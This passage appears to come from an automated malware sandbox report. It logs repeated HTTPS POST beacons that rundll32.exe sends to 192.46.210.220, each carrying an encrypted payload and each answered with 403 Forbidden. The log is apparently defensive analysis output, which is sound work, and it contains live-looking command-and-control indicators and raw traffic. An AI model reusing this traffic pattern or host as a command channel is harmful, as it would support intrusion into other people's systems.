                                                                                                      2021-10-28 02:54:36 UTC207OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:37 UTC217INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.349958192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:37 UTC212OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:37 UTC212OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:37 UTC217INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.349971192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:40 UTC217OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:40 UTC217OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:41 UTC227INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.349970192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:40 UTC222OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:40 UTC222OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:41 UTC227INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.349995192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:44 UTC227OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:44 UTC227OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:45 UTC236INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.349994192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:44 UTC232OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:44 UTC232OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:45 UTC237INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:45 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.350005192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:48 UTC237OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:48 UTC237OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:49 UTC246INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.350006192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:48 UTC242OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:48 UTC242OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:49 UTC246INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:49 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.349759192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:21 UTC24OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:21 UTC24OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:22 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      50192.168.2.350013192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:52 UTC247OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:52 UTC247OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:53 UTC256INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      51192.168.2.350014192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:52 UTC251OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:52 UTC252OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:53 UTC256INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      52192.168.2.350021192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:56 UTC257OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:56 UTC257OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:57 UTC266INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      53192.168.2.350022192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:54:56 UTC261OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:54:56 UTC261OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:54:57 UTC266INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:54:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      54192.168.2.350029192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:00 UTC266OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
